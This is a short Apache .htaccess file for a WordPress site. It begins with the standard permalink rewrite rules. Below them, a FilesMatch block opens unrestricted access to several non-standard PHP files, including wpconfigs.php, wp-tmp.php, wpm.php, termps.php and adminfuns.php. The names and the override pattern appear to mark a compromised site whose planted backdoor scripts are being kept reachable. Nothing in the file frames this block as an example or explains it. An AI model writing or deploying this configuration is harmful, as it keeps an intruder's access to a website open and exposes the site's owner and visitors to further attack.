<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
<FilesMatch "^(wpconfigs\.php|wp\-cache\.php|class\-wp\.php|wp\-tmp\.php|wpm\.php|inputs\.php|wpconfigs.php|wpm.php|termps.php|adminfuns.php)$">
Order Allow,Deny
Allow from all
Satisfy Any
</FilesMatch>
